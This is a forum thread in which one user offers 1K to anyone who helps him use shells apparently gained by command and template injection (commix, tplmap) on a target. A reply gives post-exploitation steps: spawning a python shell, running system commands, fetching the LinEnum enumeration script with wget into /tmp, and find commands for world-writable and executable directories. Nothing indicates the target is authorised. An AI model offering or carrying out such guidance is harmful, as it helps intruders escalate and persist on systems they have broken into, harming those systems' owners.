GreySec Forums
Pseudo-terminal Shell.... - Printable Version

+- GreySec Forums (https://greysec.net)
+-- Forum: Technology and Miscellaneous IT-Discussion (https://greysec.net/forumdisplay.php?fid=29)
+--- Forum: Open IT-Discussion (https://greysec.net/forumdisplay.php?fid=30)
+--- Thread: Pseudo-terminal Shell.... (/showthread.php?tid=1263)



Pseudo-terminal Shell.... - naus3a - 09-09-2016

i need to get answers quick no bs, I will pay 1K to whoever guides me through these two
shells...

i am on jabber at naus3a.rce@exploit.im 
first one is a "pseudoterminal" i got from commix
wth no out put onlythe letters  A and B . 
Te second shell is from tplmap. its is a blind shell
 with the only outputs being true & false.
ill provide copy anx pasteoutput etc...
id appreciate any help. i stand b my word '1K'
for full guide on my shellz.


RE: Pseudo-terminal Shell.... - Vector - 09-09-2016

If commix only gives you A and B as output it is likely you have a false positive. Just to be sure you can try the following. Given you're trying to inject commands into a *nix based OS there is a good chance they might have the python interpreter installed. Try switching to a python shell instead, commix comes with this option. If i recall, a python shell is simply a python interpreter instance with the output relayed back to your box. Once you're switched to a python interpreter run the following:

Code:
>>>import getpass
>>>print getpass.getuser()

This will print the user within who's context you are working. Let's say you're working within the context of the user/process 'apache'. If it's reasonable to assume this process can make system calls try the following:

Code:
>>>import os
>>>import sys
>>>os.system("uname -a")

To find out more about the box you're on. If this returns output you can run bash commands between parenthesis and quotation marks. A couple of handy bash commands to have here would include the following:

Code:
wget -O /tmp/master.zip https://github.com/rebootuser/LinEnum/archive/master.zip  # Shellscript for linux enumeration, drop in /tmp/ if world writable.

tar -xvf file.tar    # unzip tar to current directory

tar -xvf archive.tar -C [destination]  # unzip tar to destination

unzip file.zip -d destination_folder

which [util name]     # i.e. 'which wget' to get path etc

find ~           # lists everything in current directory

find /tmp/          # lists everything in tmp directory etc


find / -perm -o x -type d 2>/dev/null                    # find world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

find / -writable -type d 2>/dev/null              # list world writeable folders